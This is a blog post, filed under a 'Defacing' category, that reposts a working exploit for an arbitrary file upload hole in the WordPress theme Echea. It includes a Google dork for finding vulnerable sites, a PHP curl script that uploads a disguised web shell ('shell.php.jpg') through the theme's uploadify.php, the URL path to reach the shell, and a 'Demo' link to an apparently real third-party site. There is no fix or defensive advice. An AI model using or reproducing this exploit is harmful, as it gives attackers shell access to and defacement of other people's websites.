Home » Defacing » Wordpress Theme Echea Shell Upload Vulnerability

Sabtu, 30 Agustus 2014

Wordpress Theme Echea Shell Upload Vulnerability





############################################################################
# Title : Wordpress Theme Echea Shell Upload Vulnerability   
# Author : Aloulou                                             
# Date : 15/05/2014                                                    
# Facebook : http://www.facebook.com/Aloulou.TN                               
# Email: aloulou@alquds.com
# Vendor : www.themeforest.net                                                     
# Google Dork : inurl:/wp-content/themes/echea/
# Tested on : Linux
                        
############################################################################
Exploit:
<?php
$uploadfile="shell.php.jpg";
$ch = curl_init("http://127.0.0.1/wp-content/themes/echea/js/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
ShellAccess:
    http://127.0.0.1/wp-content/themes/echea/js/cufon-fonts/uploaded/custom_shell.php.jpg
Demo:http://yanaselandscaping.com
# Greeting to : Tunisia ,  CyberPink , Brikovich , Anonboy
############################################################################
# 120773CDEC4B3C62   1337day.com [2014-08-31]   BF54DAAA2B06D615 #

Posted in:
Posting Lebih Baru Posting Lama Beranda

0 komentar:

Posting Komentar